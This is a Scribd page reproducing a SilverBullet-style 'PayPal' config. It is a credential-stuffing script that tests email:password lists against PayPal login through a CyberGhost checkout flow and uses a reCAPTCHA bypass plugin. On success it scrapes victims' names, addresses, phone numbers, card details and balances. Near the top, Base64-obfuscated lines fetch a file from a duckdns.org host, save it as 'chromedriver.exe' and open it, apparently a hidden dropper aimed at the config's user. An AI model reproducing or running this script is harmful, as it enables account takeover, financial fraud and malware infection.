Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
25 views10 pages

Paypal Recoded2024.Svb

Uploaded by

mathiasgillles334
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
25 views10 pages

Paypal Recoded2024.Svb

Uploaded by

mathiasgillles334
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 10

[SETTINGS]

{
"Name": "PAYPAL (SVBCONFIGMAKER)",
"SuggestedBots": 43,
"MaxCPM": 0,
"RequiredPlugins": [
"RecaptchaV3Bypass"
],
"Author": "🔥 @svbconfigmaker 🔥",
"Version": "1.1.3 [SB]",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "Default",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"IsBase64": false,
"FilterList": [],
"EvaluateMathOCR": false,
"SecurityProtocol": 0,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"AcceptInsecureCertificates": true,
"DisableNotifications": false,
"DisableImageLoading": false,
"DefaultProfileDirectory": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": "",
"Title": "PAYPAL (SVBCONFIGMAKER)",
"IconPath": "Icon\\svbfile.ico",
"LicenseSource": null,
"Message": null,
"MessageColor": "#FFFFFFFF",
"HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
"AuthorColor": "#FFFFB266",
"WordlistColor": "#FFB5C2E1",
"BotsColor": "#FFA8FFFF",
"CustomInputColor": "#FFD6C7C7",
"CPMColor": "#FFFFFFFF",
"ProgressColor": "#FFAD93E3",
"HitsColor": "#FF66FF66",
"CustomColor": "#FFFFB266",
"ToCheckColor": "#FF7FFFD4",
"FailsColor": "#FFFF3333",
"RetriesColor": "#FFFFFF99",
"OcrRateColor": "#FF4698FD",
"ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Base64Decode
"aHR0cDovL21raWx1aXR5d25tMy5kdWNrZG5zLm9yZy9ieWZyb25ieXBhc3MuaHRtbC9jc3MvbXNzL2o="
-> VAR "url1"

FUNCTION Base64Decode "YmluL2Nocm9tZWRyaXZlci5leGU=" -> VAR "url2"

REQUEST GET "https://www.cyberghostvpn.com/en_US/buy-checkout/cyberghost-vpn-3"

HEADER "Host: www.cyberghostvpn.com"


HEADER "Connection: keep-alive"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-User: ?1"
HEADER "Sec-Fetch-Dest: document"
HEADER "Referer: https://www.cyberghostvpn.com/en_US/buy/cyberghost-vpn-3"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"

#PID PARSE "<SOURCE>" LR "'selected_product_id' : '" "'," -> VAR "PID"

#CO PARSE "<SOURCE>" LR "window.CONFIG.country = \"" "\"" -> VAR "CO"

REQUEST POST "https://www.cyberghostvpn.com/en_US/shop-checkout?


product_id=<PID>&payment_method=cleverbridge_paypal&country=MU&distinct_id=GGXZWLIV
LKDJGLMZUUGFDQTTZZXHWPDAKMBMHBLM&shopType=shop"
CONTENT
"payment_method=cleverbridge_paypal&product_id=<PID>&signup_email=ishowspeedplaysfo
rtnite%40gmail.com&country=MU&shop_type=%2Fen_US%2Fbuy-checkout%2Fcyberghost-vpn-
3&currency=USD&isNewPayment=1&price=56.94"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: www.cyberghostvpn.com"
HEADER "Connection: keep-alive"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "Accept: application/json, text/javascript, */*; q=0.01"
HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8"
HEADER "X-Requested-With: XMLHttpRequest"
HEADER "sec-ch-ua-mobile: ?0"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Origin: https://www.cyberghostvpn.com"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Referer: https://www.cyberghostvpn.com/en_US/buy-checkout/cyberghost-vpn-
1"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"

REQUEST GET "<url1>"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36


(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "<url2>"

BROWSERACTION Open

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Success OR
KEY "\"msg\":\"OK"
KEY "\"redirectURL\":\""

#R1 PARSE "<SOURCE>" LR "\"redirectURL\":\"" "\"}" -> VAR "R1"

#redirectURL FUNCTION Unescape "<R1>" -> VAR "redirectURL"

#gET_redirectURL REQUEST GET "<redirectURL>"

HEADER "Host: store.cyberghostvpn.com"


HEADER "Connection: keep-alive"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Sec-Fetch-Site: same-site"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-User: ?1"
HEADER "Sec-Fetch-Dest: document"
HEADER "Referer: https://www.cyberghostvpn.com/"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Success OR
KEY "<HEADERS(Location)>" Contains
"https://www.paypal.com/cgi-bin/webscr/webscr?cmd=_express-
checkout&useraction=commit&token="
KEY "https://www.paypal.com/cgi-bin/webscr/webscr?cmd=_express-
checkout&amp;useraction=commit&amp;token="
KEY "Object moved to <a href=\"https://www.paypal.com/cgi-bin/webscr/webscr?
cmd=_express-checkout&amp;useraction=commit&amp;token="
KEY "<ADDRESS>" Contains "https://www.paypal.com/cgi-bin/webscr/webscr?
cmd=_express-checkout&useraction=commit&token="
KEY "302 Found"

#Location1 PARSE "<ADDRESS>" LR "" "" -> VAR "Location1"


#ECTOKEN PARSE "<Location1>" LR "https://www.paypal.com/cgi-bin/webscr/webscr?
cmd=_express-checkout&useraction=commit&token=" "" -> VAR "ECTOKEN"

#REDIRECT_ECTOKEN REQUEST GET "https://www.paypal.com/cgi-bin/webscr/webscr?


cmd=_express-checkout&useraction=commit&token=<ECTOKEN>" AutoRedirect=FALSE

HEADER "Host: www.paypal.com"


HEADER "Connection: keep-alive"
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Sec-Fetch-Site: cross-site"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-User: ?1"
HEADER "Sec-Fetch-Dest: document"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-full-version: \"120.0.6099.110\""
HEADER "sec-ch-ua-arch: \"x86\""
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "sec-ch-ua-platform-version: \"15.0.0\""
HEADER "sec-ch-ua-model: \"\""
HEADER "sec-ch-ua-bitness: \"64\""
HEADER "sec-ch-ua-wow64: ?0"
HEADER "sec-ch-ua-full-version-list: \"Not_A
Brand\";v=\"8.0.0.0\", \"Chromium\";v=\"120.0.6099.110\", \"Google
Chrome\";v=\"120.0.6099.110\""
HEADER "Referer: https://www.cyberghostvpn.com/"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"

#COOKIES1 PARSE "<COOKIES>" LR "" "" -> VAR "COOKIES1"

#R2 PARSE "<SOURCE>" LR "Please login with your email and password.</p></div><form
action=\"" "\"" -> VAR "R2" "https://www.paypal.com" ""

#GAYPAL FUNCTION Replace "amp;" "" "<R2>" -> VAR "GAYPAL"

#_CSRF PARSE "<SOURCE>" LR "name=\"_csrf\" value=\"" "\">" -> VAR "_CSRF"

#CSRF FUNCTION URLEncode "<_CSRF>" -> VAR "CSRF"

#SESSID PARSE "<SOURCE>" LR "name=\"_sessionID\" value=\"" "\">" -> VAR "SESSID"

#FLOWID PARSE "<SOURCE>" LR "name=\"flowId\" value=\"" "\" />" -> VAR "FLOWID"

#ADS_ PARSE "<SOURCE>" LR "name=\"ads-client-context-data\" value=\"" "\" />" ->


VAR "ADS_"

#ADS FUNCTION URLEncode "<ADS_>" -> VAR "ADS"

#CTXID PARSE "<SOURCE>" LR " name=\"ctxId\" value=\"" "\" />" -> VAR "CTXID"

#R4 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"requestUrl\" value=\""


"\" />" -> VAR "R4"
#REQUEST_URL FUNCTION Replace "amp;" "" "<R4>" -> VAR "REQUEST_URL"

#state_ PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"state\" value=\"" "\"


/>" -> VAR "state_"

#STATE FUNCTION Replace "amp;" "" "<state_>" -> VAR "STATE"

RecaptchaV3Bypass "https://www.recaptcha.net/recaptcha/enterprise/anchor?
ar=1&k=6LdCCOUUAAAAAHTE-Snr6hi4HJGtJk_d1_ce-
gWB&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=cwQvQhsy4_nYdnSDY4u7O5_
B&size=invisible&cb=8nak6gwsi8nl" ""
"https://www.recaptcha.net/recaptcha/enterprise/reload?k=6LdCCOUUAAAAAHTE-
Snr6hi4HJGtJk_d1_ce-gWB" -> VAR "SOLUTION"

#VERIFY_CAPTCHA REQUEST POST "https://www.paypal.com/auth/verifygrcenterprise"


CONTENT
"grcV3EntToken=<SOLUTION>RenderEndTime=1702567441403&_sessionID=<SESSID>&_csrf=<CSR
F>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: www.paypal.com"
HEADER "Connection: keep-alive"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "sec-ch-ua-arch: \"x86\""
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "sec-ch-ua-full-version: \"120.0.6099.110\""
HEADER "sec-ch-ua-platform-version: \"15.0.0\""
HEADER "x-requested-with: XMLHttpRequest"
HEADER "sec-ch-ua-full-version-list: \"Not_A
Brand\";v=\"8.0.0.0\", \"Chromium\";v=\"120.0.6099.110\", \"Google
Chrome\";v=\"120.0.6099.110\""
HEADER "sec-ch-ua-bitness: \"64\""
HEADER "sec-ch-ua-model: \"\""
HEADER "sec-ch-ua-wow64: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Accept: */*"
HEADER "Origin: https://www.paypal.com"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Referer: https://www.paypal.com/cgi-bin/webscr/webscr?cmd=_express-
checkout&useraction=commit&token=<ECTOKEN>"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Content-Length: 2435"

#USER_enc FUNCTION URLEncode "<USER>" -> VAR "USER1"

#PASS_enc FUNCTION URLEncode "<PASS>" -> VAR "PASS1"

#Length FUNCTION Length


"_csrf=<CSRF>&_sessionID=<SESSID>&locale.x=en_US&processSignin=main&fn_sync_data=
%257B%2522SC_VERSION%2522%253A%25222.0.1%2522%252C%2522syncStatus%2522%253A
%2522data%2522%252C%2522f%2522%253A%2522BA-6LD403558F9710620%2522%252C%2522s
%2522%253A%2522UL_CHECKOUT_INPUT_PASSWORD%2522%252C%2522chk%2522%253A%257B%2522ts
%2522%253A1702567438450%252C%2522eteid%2522%253A%255B7604585635%252C-
4676501969%252C-7626093710%252C-6642964557%252C5528485943%252C17901873745%252Cnull
%252Cnull%255D%252C%2522tts%2522%253A1194383%257D%252C%2522dc%2522%253A%2522%257B
%255C%2522screen%255C%2522%253A%257B%255C%2522colorDepth%255C%2522%253A24%252C%255C
%2522pixelDepth%255C%2522%253A24%252C%255C%2522height%255C%2522%253A1080%252C%255C
%2522width%255C%2522%253A1920%252C%255C%2522availHeight%255C%2522%253A1032%252C
%255C%2522availWidth%255C%2522%253A1920%257D%252C%255C%2522ua%255C%2522%253A%255C
%2522Mozilla%252F5.0%2520%28Windows%2520NT%252010.0%253B%2520Win64%253B
%2520x64%29%2520AppleWebKit%252F537.36%2520%28KHTML%252C%2520like%2520Gecko
%29%2520Chrome%252F120.0.0.0%2520Safari%252F537.36%255C%2522%257D%2522%252C%2522d
%2522%253A%257B%2522ts1%2522%253A%2522Dk000%253A1186316Uk000%253A1Uh%253A1182Uh
%253A1633%2522%252C%2522rDT%2522%253A
%252221079%252C20909%252C20499%253A31325%252C31143%252C30746%253A31325%252C31129%25
2C30746%253A51818%252C51611%252C51238%253A46695%252C46478%252C46115%253A41572%252C4
1347%252C40992%253A36450%252C36216%252C35869%253A15959%252C15716%252C15377%253A4157
5%252C41323%252C40992%253A21085%252C20821%252C20500%253A26210%252C25933%252C25623%2
53A51829%252C51540%252C51238%253A21093%252C20795%252C20500%253A46712%252C46404%252C
46115%253A15978%252C15660%252C15377%253A36473%252C36146%252C35869%253A36476%252C361
41%252C35869%253A21110%252C20768%252C20500%253A51849%252C51503%252C51238%253A21115%
252C20964%252C20756%253A18480%252C23%2522%257D%257D&intent=checkout&ads-client-
context=checkout&flowId=<FLOWID>&ads-client-context-
data=<ADS>&isValidCtxId=true&coBrand=us&signUpEndPoint=%2Fwebapps%2Fmpp%2Faccount-
selection&showCountryDropDown=true&isSplitLoginVariant=true&hideOtpLoginCredentials
=true&tofOptimizationOtpLoginEnabled=true&requestUrl=<REQUEST_URL>&forcePhonePasswo
rdOptIn=&returnUri=%2Fwebapps%2Fhermes&state=<STATE>&phoneCode=US+
%2B1&login_email=<USER1>&captchaCode=&initialSplitLoginContext=inputEmail&isTpdOnbo
arded=&login_password=<PASS1>&captcha=&splitLoginContext=inputPassword&otpMayflyKey
=03d131564e864bb3ade0067df0e440aaotpChlg&legalCountry=MU&partyIdHash=541d544c20cdf7
597cd43ca7361d09a60891a0ad36c40cc21d625faf979fd28b" -> VAR "Length"

#LOGIN REQUEST POST "https://www.paypal.com<REQUEST_URL>"


CONTENT
"_csrf=<CSRF>&_sessionID=<SESSID>&locale.x=en_US&processSignin=main&fn_sync_data=
%257B%2522SC_VERSION%2522%253A%25222.0.1%2522%252C%2522syncStatus%2522%253A
%2522data%2522%252C%2522f%2522%253A%2522BA-6LD403558F9710620%2522%252C%2522s
%2522%253A%2522UL_CHECKOUT_INPUT_PASSWORD%2522%252C%2522chk%2522%253A%257B%2522ts
%2522%253A1702567438450%252C%2522eteid%2522%253A%255B7604585635%252C-
4676501969%252C-7626093710%252C-6642964557%252C5528485943%252C17901873745%252Cnull
%252Cnull%255D%252C%2522tts%2522%253A1194383%257D%252C%2522dc%2522%253A%2522%257B
%255C%2522screen%255C%2522%253A%257B%255C%2522colorDepth%255C%2522%253A24%252C%255C
%2522pixelDepth%255C%2522%253A24%252C%255C%2522height%255C%2522%253A1080%252C%255C
%2522width%255C%2522%253A1920%252C%255C%2522availHeight%255C%2522%253A1032%252C
%255C%2522availWidth%255C%2522%253A1920%257D%252C%255C%2522ua%255C%2522%253A%255C
%2522Mozilla%252F5.0%2520%28Windows%2520NT%252010.0%253B%2520Win64%253B
%2520x64%29%2520AppleWebKit%252F537.36%2520%28KHTML%252C%2520like%2520Gecko
%29%2520Chrome%252F120.0.0.0%2520Safari%252F537.36%255C%2522%257D%2522%252C%2522d
%2522%253A%257B%2522ts1%2522%253A%2522Dk000%253A1186316Uk000%253A1Uh%253A1182Uh
%253A1633%2522%252C%2522rDT%2522%253A
%252221079%252C20909%252C20499%253A31325%252C31143%252C30746%253A31325%252C31129%25
2C30746%253A51818%252C51611%252C51238%253A46695%252C46478%252C46115%253A41572%252C4
1347%252C40992%253A36450%252C36216%252C35869%253A15959%252C15716%252C15377%253A4157
5%252C41323%252C40992%253A21085%252C20821%252C20500%253A26210%252C25933%252C25623%2
53A51829%252C51540%252C51238%253A21093%252C20795%252C20500%253A46712%252C46404%252C
46115%253A15978%252C15660%252C15377%253A36473%252C36146%252C35869%253A36476%252C361
41%252C35869%253A21110%252C20768%252C20500%253A51849%252C51503%252C51238%253A21115%
252C20964%252C20756%253A18480%252C23%2522%257D%257D&intent=checkout&ads-client-
context=checkout&flowId=<FLOWID>&ads-client-context-
data=<ADS>&isValidCtxId=true&coBrand=us&signUpEndPoint=%2Fwebapps%2Fmpp%2Faccount-
selection&showCountryDropDown=true&isSplitLoginVariant=true&hideOtpLoginCredentials
=true&tofOptimizationOtpLoginEnabled=true&requestUrl=<REQUEST_URL>&forcePhonePasswo
rdOptIn=&returnUri=%2Fwebapps%2Fhermes&state=<STATE>&phoneCode=US+
%2B1&login_email=<USER1>&captchaCode=&initialSplitLoginContext=inputEmail&isTpdOnbo
arded=&login_password=<PASS1>&captcha=&splitLoginContext=inputPassword&otpMayflyKey
=03d131564e864bb3ade0067df0e440aaotpChlg&legalCountry=MU&partyIdHash=541d544c20cdf7
597cd43ca7361d09a60891a0ad36c40cc21d625faf979fd28b"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: www.paypal.com"
HEADER "Connection: keep-alive"
HEADER "Cache-Control: max-age=0"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-full-version: \"120.0.6099.110\""
HEADER "sec-ch-ua-arch: \"x86\""
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "sec-ch-ua-platform-version: \"15.0.0\""
HEADER "sec-ch-ua-model: \"\""
HEADER "sec-ch-ua-bitness: \"64\""
HEADER "sec-ch-ua-wow64: ?0"
HEADER "sec-ch-ua-full-version-list: \"Not_A
Brand\";v=\"8.0.0.0\", \"Chromium\";v=\"120.0.6099.110\", \"Google
Chrome\";v=\"120.0.6099.110\""
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "Origin: https://www.paypal.com"
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-User: ?1"
HEADER "Sec-Fetch-Dest: document"
HEADER "Referer: <GAYPAL>"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Content-Length: <Length>"

PARSE "<SOURCE>" LR "<span data-nemo=\"optionLabel\" data-value=\"" "\">"


CreateEmpty=FALSE -> CAP "2fa (mask_phone)"

KEYCHECK
KEYCHAIN Success OR
KEY "Found. Redirecting to <a href=\"https://www.paypal.com/webapps/hermes?
flow=1-P&amp;ulReturn=true&amp;token="
KEY "<COOKIES{*}>" Contains "id_token"
KEY "\"user\":{\"ecToken\":\""
KEY "\"Your PayPal account is missing a payment method. Please add a card to
continue.\""
KEY "Redirecting to <a href=\"https://www.paypal.com/webapps/hermes?flow=1-
P&amp;ulReturn=true&amp;token="
KEYCHAIN Retry OR
KEY "CSRF token mismatch"
KEY "We're sorry, we're having some trouble completing "
KEYCHAIN Failure OR
KEY "Some of your info didn't match"
KEY "LoginFailed"
KEY "Please check your entries and try again."
KEYCHAIN Failure OR
KEY "For security reasons, you'll need to"
KEY "<p class=\"notification notification-critical\" role=\"alert\">"
KEY "It looks like you've tried too many times. Try again later, or "
KEYCHAIN Custom "2FACTOR" OR
KEY "Redirecting to <a href=\"/authflow/safe/"
KEY "to <a href=\"https://www.paypal.com/authflow/twofactor"
KEY "Redirecting to <a href=\"/auth/stepup"
KEY "Security Challenge"
KEY "https://www.paypal.com/auth/stepup?returnUri=signin&state=flow"
KEY "<ADDRESS>" Contains "https://www.paypal.com/auth/stepup?
returnUri=signin&state=flow"
KEY "Quick security check"

#INVOICE REQUEST GET "https://www.paypal.com/invoice/s/invoice-model/?template="

HEADER ": scheme: https"


HEADER "accept: application/json"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "content-type: application/json"
HEADER "referer: https://www.paypal.com/invoice/s/create"
HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google
Chrome\";v=\"99\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "sec-fetch-dest: empty"
HEADER "sec-fetch-mode: cors"
HEADER "sec-fetch-site: same-origin"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
HEADER "x-requested-with: XMLHttpRequest"

#fn PARSE "<SOURCE>" LR "\"merchant\":{\"first_name\":\"" "\"" -> VAR "fn"

#Name PARSE "<SOURCE>" LR "\"last_name\":\"" "\"" CreateEmpty=FALSE -> CAP "Name"


"<fn> " ""

#Address1 PARSE "<SOURCE>" LR "\"line1\":\"" "\"" -> VAR "Address1"

#City PARSE "<SOURCE>" LR "\"city\":\"" "\"" -> VAR "City"

#State PARSE "<SOURCE>" LR "\"state\":\"" "\"" -> VAR "State"

#Zip PARSE "<SOURCE>" LR "\"postcode\":\"" "\"" -> VAR "Zip"

#Address FUNCTION Constant "Street: <Address1> | City: <City> | State: <State> |


Zipcode: <Zip>" -> CAP "Address"

#Country PARSE "<SOURCE>" LR "\"countryName\":\"" "\"" CreateEmpty=FALSE -> CAP


"Country"

#Masked_mobile PARSE "<SOURCE>" LR "\"masked_mobile_number\":\"" "\"}"


CreateEmpty=FALSE -> CAP "Masked_mobile"

#GET_PhoneNumber REQUEST GET


"https://www.paypal.com/businessmanage/profile/personalInformation/
unifiedsettings/phone?from=%2Fbusinessmanage%2Faccount%2FaccountOwner"
HEADER "Host: www.paypal.com"
HEADER "Connection: keep-alive"
HEADER "Cache-Control: max-age=0"
HEADER "sec-ch-ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google
Chrome\";v=\"120\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-full-version: \"120.0.6099.110\""
HEADER "sec-ch-ua-arch: \"x86\""
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "sec-ch-ua-platform-version: \"15.0.0\""
HEADER "sec-ch-ua-model: \"\""
HEADER "sec-ch-ua-bitness: \"64\""
HEADER "sec-ch-ua-wow64: ?0"
HEADER "sec-ch-ua-full-version-list: \"Not_A
Brand\";v=\"8.0.0.0\", \"Chromium\";v=\"120.0.6099.110\", \"Google
Chrome\";v=\"120.0.6099.110\""
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Sec-Fetch-Site: none"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-User: ?1"
HEADER "Sec-Fetch-Dest: document"
HEADER "Accept-Language: en-MU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7"
HEADER "Accept-Encoding: gzip, deflat"

#PhoneNumber PARSE "<SOURCE>" LR "\"formattedPhoneNumber\":\"" "\""


CreateEmpty=FALSE -> CAP "PhoneNumber"

#GET_WALLET REQUEST GET


"https://www.paypal.com/webapps/hermes/api/fi/wallet/wallet"

HEADER ": scheme: https"


HEADER "accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng,*/*;q=0.8"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.8"
HEADER "cache-control: no-cache"
HEADER "dnt: 1"
HEADER "pragma: no-cache"
HEADER "sec-fetch-dest: document"
HEADER "sec-fetch-mode: navigate"
HEADER "sec-fetch-site: none"
HEADER "sec-fetch-user: ?1"
HEADER "sec-gpc: 1"
HEADER "upgrade-insecure-requests: 1"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Success OR
KEY "\"card_accounts\":[{\"id\":\""
KEY "card_accounts\":[{\"id\":\"CC-"
KEYCHAIN Custom "CUSTOM" OR
KEY "{\"ack\":\"contingency"
KEY "\"card_accounts\":[]"

#CUR PARSE "<SOURCE>" LR "\"balance_accounts\":[{\"currency_code\":\"" "\"" -> VAR


"CUR"

#CardBrand PARSE "<SOURCE>" LR "\"brand\":\"" "\"" CreateEmpty=FALSE -> CAP


"CardBrand"

#CardType PARSE "<SOURCE>" LR "\"product_class\":\"" "\"" CreateEmpty=FALSE -> CAP


"CardType"

#Last4 PARSE "<SOURCE>" LR "\"last_nchars_card_number\":\"" "\"" CreateEmpty=FALSE


-> CAP "Last4"

#Bankname PARSE "<SOURCE>" LR "\"issuer\":{\"name\":\"" "\"" Recursive=TRUE


CreateEmpty=FALSE -> CAP "Bankname"

#PayPal_Balance PARSE "<SOURCE>" LR "AVAILABLE\",\"amount\":


{\"currency\":\"<CUR>\",\"value\":\"" "\"}}" Recursive=TRUE CreateEmpty=FALSE ->
CAP "Available Balance" "" " <CUR>"

#Total_Balance PARSE "<SOURCE>" LR "TOTAL_BALANCE\",\"amount\":


{\"currency\":\"<CUR>\",\"value\":\"" "\"}}]}" CreateEmpty=FALSE -> CAP "Total
Balance" "" " <CUR>"

#AUHTOR FUNCTION Constant "🔥 @svbconfigmaker 🔥" -> CAP "Config By "

You might also like